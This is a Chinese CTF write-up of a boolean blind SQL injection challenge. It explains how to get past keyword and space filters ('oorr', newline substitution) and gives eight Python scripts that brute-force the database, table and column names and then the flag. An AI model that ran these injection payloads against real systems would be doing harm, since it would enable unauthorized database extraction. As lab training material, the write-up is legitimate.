也可用bp进行爆破,这里用py脚本。
打看网页输入1,显示You are in,输入2,显示You are not in,是个布尔注入。
然后看看过滤了什么。
sql注入没有过滤:--+、or
sql注入过滤:union select、and、order by、空格
虽然or没有被当做sql注入处理,但是构造id=1'/**/or/**/1'='1--+时仍然是返回,You are not in。
所以应该是,or仍然被过滤,只是没有被当做sql注入,于是利用oorr来绕过。下面给出爆破脚本:
1.暴库长
import requests
s='You are in'
url='http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(30):
key={'id':"0'oorr(length(database())=%s)oorr'0"%i}
r=requests.post(url,data=key).text
print(i)
if s in r:
print(i)
break结果是18.
2.爆库名
import requests
url='http://ctf5.shiyanbar.com/web/earnest/index.php'
p='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
database=''
for i in range(19):
for j in p:
key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
r=requests.post(url,data=key).text
if s in r:
database+=j
print(database)
break
print('answer is:')
print(database)
结果是:ctf_sql_bool_blind
3.爆表长
import requests
url='http://ctf5.shiyanbar.com/web/earnest/index.php'
s='You are in'
i=1
while True:
pay="0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0"%i
pay=pay.replace(' ',chr(0x0a))
key={'id':pay}
r=requests.post(url,data=key).text
print(key)
if s in r:
print(i)
break
i+=1结果是:11
4.爆表名
import requests
url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
tables=''
for i in range(12):
for j in guess:
flag="0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
#flag="0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
flag=flag.replace(' ',chr(0x0a))
pay={'id':flag}
r=requests.post(url,data=pay).text
print(pay)
if s in r:
tables+=j
print(j)
break
print (tables)结果是:fiag@users
显然我们需要的是fiag。
5.爆列长
import requests
url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
i=1
while True:
flag="0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i
flag=flag.replace(' ',chr(0x0a))
pay={'id':flag}
r=requests.post(url,data=pay).text
print(pay)
if s in r:
print(i)
break
i+=1结果是:6
6.爆列名
import requests
url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
columns=''
for i in range(1,7):
for j in guess:
flag="0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
#flag="0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
flag=flag.replace(' ',chr(0x0a))
pay={'id':flag}
r=requests.post(url,data=pay).text
print(pay)
if s in r:
columns+=j
print(j)
break
print(columns)结果是:fl$4g
7.爆字段长
import requests
url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
i=1
while True:
pay={'id':"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='')oorr'0"%i}
r=requests.post(url,data=pay).text
print(pay)
if s in r:
print(i)
break
i+=1结果是13
8.爆字段
import requests
url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
dump=''
for i in range(1,15):
for j in guess:
pay={'id':"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,j)}
r=requests.post(url,data=pay).text
print(pay)
if s in r:
dump+=j
print(j)
break
print(dump)结果竟然是flag{haha~you。
蒙圈,看了大佬的wp才知道,原来第十四位是‘ ’,不过估计后面的内容也不长,于是改个数字继续跑就跑出结果了。
转载于:https://www.cnblogs.com/RenoStudio/p/10355114.html